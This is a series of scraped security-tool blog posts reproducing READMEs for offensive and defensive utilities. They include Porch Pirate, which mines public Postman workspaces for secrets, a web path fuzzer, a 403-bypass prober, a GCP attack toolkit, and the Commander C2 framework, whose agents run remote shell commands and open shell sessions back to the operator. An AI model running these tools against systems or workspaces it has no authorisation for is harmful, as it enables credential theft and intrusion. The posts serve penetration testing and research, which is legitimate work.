  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

from porchpirate import porchpirate  # import path assumed from the package name

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

from porchpirate import porchpirate

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

import json

from porchpirate import porchpirate

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
        request_data = p.request(r['id'])
        print(request_data)

Grabbing a Workspace's Globals

from porchpirate import porchpirate

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


☐ β˜† βœ‡ KitPloit - PenTest Tools!

C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R β€” December 4th 2023 at 11:30

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.



Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to search google.com on port 443 using the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.

Support

Name Support
Metasploit βœ…
Havoc ❓
Cobalt Strike βœ…
Bruteratel βœ…
Sliver βœ…
DeimosC2 βœ…
PhoenixC2 βœ…
Empire ❌
Merlin βœ…
Covenant ❌
Villain βœ…
Shad0w ❌
PoshC2 βœ…

Legend:

  • βœ… - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the License - see the LICENSE file for details.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R β€” November 10th 2023 at 11:30

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


Features

  • Afuzz automatically detects the development language used by the website, and generates extensions according to the language
  • Uses blacklist to filter invalid pages
  • Uses whitelist to find content that bug bounty hunters are interested in in the page
  • filters random content in the page
  • judges 404 error pages in multiple ways
  • perform statistical analysis on the results after scanning to obtain the final result.
  • support HTTP2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | product.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+

Json

{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words ": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"t ype": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"targe t": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

  • Wordlist is a text file, each line is a path.
  • About extensions, Afuzz replaces the %EXT% keyword with extensions from -e flag.If no flag -e, the default is used.
  • Generate a dictionary based on domain names. Afuzz replaces %subdomain% with host, %rootdomain% with root domain, %sub% with subdomain, and %domain% with domain. And generated according to %ext%

Examples:

  • Normal extensions
index.%EXT%

Passing asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx
  • host
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and the php extension will generate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip
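A small Python sketch of this substitution logic (illustrative only; the function below is not Afuzz's actual internals):

def expand_line(line, extensions, subdomain, rootdomain, sub, domain):
    """Expand one wordlist line into concrete paths (illustrative only)."""
    line = (line.replace("%subdomain%", subdomain)
                .replace("%rootdomain%", rootdomain)
                .replace("%sub%", sub)
                .replace("%domain%", domain))
    if "%EXT%" in line:
        # One path without the extension, plus one path per extension
        return [line.replace(".%EXT%", "")] + [line.replace("%EXT%", ext) for ext in extensions]
    return [line]

print(expand_line("index.%EXT%", ["asp", "aspx"], "test-www.hackerone.com", "hackerone.com", "test-www", "hackerone"))
# ['index', 'index.asp', 'index.aspx']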

Options




usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL
  -o OUTPUT, --output OUTPUT
                        Output file
  -e EXTENSIONS, --extensions EXTENSIONS
                        Extension list separated by commas (Example: php,aspx,jsp)
  -t THREAD, --thread THREAD
                        Number of threads
  -d DEPTH, --depth DEPTH
                        Maximum recursion depth
  -w WORDLIST, --wordlist WORDLIST
                        wordlist
  -f, --fullpath        fullpath
  -p PROXY, --proxy PROXY
                        proxy, (ex:http://127.0.0.1:8080)

How to use

Some examples of how to use Afuzz with the most common arguments. If you need all of them, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --thread) reflects the number of separate brute-force processes, so the bigger the thread number, the faster Afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

In spite of that, the speed still depends a lot on the response time of the server. As a warning, we advise you to keep the number of threads reasonable, because a very high value can cause a DoS.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists that can filter out some pages.

The blacklist.txt file is the same as dirsearch's.

The bad_string.txt file is a text file with one rule per line. The format is position==content, with == as the separator; position has the following options: header, body, regex, title.
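For example, rules in bad_string.txt could look like the following (illustrative values, not shipped defaults):

title==404 Not Found
body==Access Denied
header==X-Example-Waf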

Language detection

The language.txt file contains the language-detection rules; the format is consistent with bad_string.txt. It is used to detect the development language of the website.

References

Thanks to the following open source projects for inspiration:

  β€’ Dirsearch by Shubham Sharma
  β€’ wfuzz by Xavi Mendez
  β€’ arjun by Somdev Sangwan


☐ β˜† βœ‡ KitPloit - PenTest Tools!

WebSecProbe - Web Security Assessment Tool, Bypass 403

By: Zion3R β€” November 6th 2023 at 11:30


A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.


WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does (a condensed Python sketch follows the list):

  • It takes user input for the target URL and the path.
  • It defines a list of payloads that represent different HTTP request variations, such as URL-encoded characters, special headers, and different HTTP methods.
  • It iterates through each payload and constructs a full URL by appending the payload to the target URL.
  • For each constructed URL, it sends an HTTP GET request using the requests library, and it captures the response status code and content length.
  • It prints the constructed URL, status code, and content length for each request, effectively showing the results of each variation's response from the target server.
  • After testing all payloads, it queries the Wayback Machine (a web archive) to check if there are any archived snapshots of the target URL/path. If available, it prints the closest archived snapshot's information.

Does This Tool Bypass 403?

It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.

In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.


pip install WebSecProbe

WebSecProbe <URL> <Path>

Example:

WebSecProbe https://example.com admin-login

from WebSecProbe.main import WebSecProbe

if __name__ == "__main__":
    url = 'https://example.com'  # Replace with your target URL
    path = 'admin-login'  # Replace with your desired path

    probe = WebSecProbe(url, path)
    probe.run()



☐ β˜† βœ‡ KitPloit - PenTest Tools!

TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

By: Zion3R β€” November 2nd 2023 at 11:30


TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.

  • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
  • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
  • Summary statistics on captured packets.
  • Interactive mode for in-depth packet inspection.
  • Timestamps for each captured packet.
  • User-friendly colored output for improved readability.
  • Python 3.x
  • scapy
  • argparse
  • pyshark
  • colorama

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/TrafficWatch.git
  2. Navigate to the project directory:

    cd TrafficWatch
  3. Install the required dependencies:

    pip install -r requirements.txt

Usage

python3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]

Packet Sniffer Tool

options:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  Path to the .pcap file to analyze
  -p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
                        Filter by specific protocol
  -c COUNT, --count COUNT
                        Number of packets to display

To analyze packets from a PCAP file, use the following command:

python trafficwatch.py -f path/to/your.pcap

To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10

  • -f or --file: Path to the PCAP file for analysis.
  • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
  • -c or --count: Limit the number of displayed packets.

Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

If you have any questions, comments, or suggestions about TrafficWatch, please feel free to contact me:

This project is licensed under the MIT License.

Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!



☐ β˜† βœ‡ KitPloit - PenTest Tools!

GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

By: Zion3R β€” October 23rd 2023 at 17:45


GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


Modules

Resource Category     Primary Module   Command Group   Operation     Description
User Authentication   auth             -               activate      Activate a Specific Authentication Method
                                       -               add           Add a New Authentication Method
                                       -               delete        Remove a Specific Authentication Method
                                       -               list          List All Available Authentication Methods
Cloud Functions       functions        -               list          List All Deployed Cloud Functions
                                       -               permissions   Display Permissions for a Specific Cloud Function
                                       -               triggers      List All Triggers for a Specific Cloud Function
Cloud Storage         storage          buckets         list          List All Storage Buckets
                                                       permissions   Display Permissions for Storage Buckets
Compute Engine        compute          instances       add-ssh-key   Add SSH Key to Compute Instances

Installation

Python 3.11 or newer should be installed. You can verify your Python version with the following command:

python --version

Manual Installation via setup.py

git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install

Automated Installation via pip

pip install gator-red

Documentation

Have a look at the GATOR Documentation for an explained guide on using GATOR and its modules!

Issues

Reporting an Issue

If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

  1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

  2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

  3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

  4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

Your feedback is important, and will help improve the tool. I appreciate your contribution!

Resolving an Issue

I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

Contributing

I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

Thank you for considering contributing to the project.

Questions and Issues

If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If, however, your query is not yet solved or you have a different question altogether, please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



☐ β˜† βœ‡ KitPloit - PenTest Tools!

SecuSphere - Efficient DevSecOps

By: Zion3R β€” October 21st 2023 at 11:30


SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


Centralized Vulnerability Management

At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

Seamless CI/CD Pipeline Integration

SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

Comprehensive Security Assessment

SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

Cultivating DevSecOps Practices

SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

 Features

  • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
  • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
  • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
  • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

Dashboard and Reporting

SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

API and Web Console

SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

For more information please refer to our Official Rest API Documentation
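
As a hedged illustration only, automating against such an API might look like the sketch below; the endpoint path and bearer-token authentication are assumptions, not SecuSphere's documented interface, so see the official REST API documentation for the real calls.

# Hypothetical sketch of pulling findings from a REST API of this kind;
# /api/vulnerabilities and token auth are assumptions, not SecuSphere's
# documented interface (see the official REST API docs).
import requests

BASE_URL = "http://localhost:8081"   # host/port from the Docker example below
TOKEN = "YOUR_API_TOKEN"             # assumption: token-based authentication

resp = requests.get(
    f"{BASE_URL}/api/vulnerabilities",  # hypothetical endpoint
    headers={"Authorization": f"Bearer {TOKEN}"},
    timeout=30,
)
resp.raise_for_status()
for finding in resp.json():
    print(finding)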

Integration with Ticketing Systems

SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

Security Training and Awareness

SecuSphere is not just a tool; it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

User Guide

Get started with SecuSphere using our comprehensive user guide.

Installation

You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

Clone the Repository

$ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

Setup

Local Setup

Navigate to the source directory and run the Python file:

$ cd src/
$ python run.py

Dockerfile Setup

Build and run the Docker image from the Dockerfile in the cicd directory:

$ # From repository root
$ docker build -t secusphere:latest .
$ docker run secusphere:latest

Docker Compose

Use Docker Compose in the ci_cd/iac/ directory:

$ cd ci_cd/iac/
$ docker-compose -f secusphere.yml up

Pull from Docker Hub

Pull the latest version of SecuSphere from Docker Hub and run it:

$ docker pull securityuniversal/secusphere:latest
$ docker run -p 8081:80 -d securityuniversal/secusphere:latest

Feedback and Support

We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

Contributing

We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Commander - A Command And Control (C2) Server

By: Zion3R β€” October 20th 2023 at 21:31


Commander is a command and control (C2) framework written in Python, using Flask and SQLite. It comes with two agents, written in Python and C.

Under Continuous Development

Not script-kiddie friendly


Features

  • Fully encrypted communication (TLS)
  • Multiple Agents
  • Obfuscation
  • Interactive Sessions
  • Scalable
  • Base64 data encoding
  • RESTful API

Agents

  • Python 3
    • The python agent supports:
      • sessions, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Both Windows and Linux systems
      • download/upload files functionality
  • C
    • The C agent supports only the basic functionality for now, the control of tasks for the agents
    • Only for Linux systems

Requirements

Python >= 3.6 and the following dependencies are required.

Linux is needed for admin.py and c2_server.py (untested on Windows).
apt install libcurl4-openssl-dev libb64-dev
apt install openssl
pip3 install -r requirements.txt

How to Use it

First create the required certs and keys

# if you want to secure your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Start the admin.py module first in order to create a local sqlite db file

python3 admin.py

Continue by running the server

python3 c2_server.py

Finally, run the agent. The Python agent can be run directly, but the C agent needs to be compiled first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64
./agent

By default both the agents and the server communicate over TLS with base64 encoding. The communication endpoint is set to 127.0.0.1:5000; if a different endpoint is needed, change it in the agents' source files.

As the Operator/Administrator you can use the following commands to control your agents

Commands:

task add arg c2-commands
Add a task to an agent, to a group or on all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register again.
c2-shell cmd: It takes a shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will check for tasks.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect to. If it is not provided it defaults to 5555.
c2-quit: Forces an agent to quit.

task delete arg
Delete a task from an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show agent arg
Displays info for all the available agents or for a specific agent.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show task arg
Displays the task of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
show result arg
Displays the history/result of an agent or all agents.
arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
find active agents
Drops the database so that the active agents will be registered again.

exit
Bye Bye!


Sessions:

sessions server arg [port]
Controls a session handler.
arg: can have the following values: 'start', 'stop', 'status'
port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
sessions select arg
Select in which session to attach.
arg: the index from the 'sessions list' result
sessions close arg
Close a session.
arg: the index from the 'sessions list' result
sessions list
Displays the available sessions
local-ls directory
Lists on your host the files on the selected directory
download 'file'
Downloads the 'file' locally on the current directory
upload 'file'
Uploads a file in the directory where the agent currently is

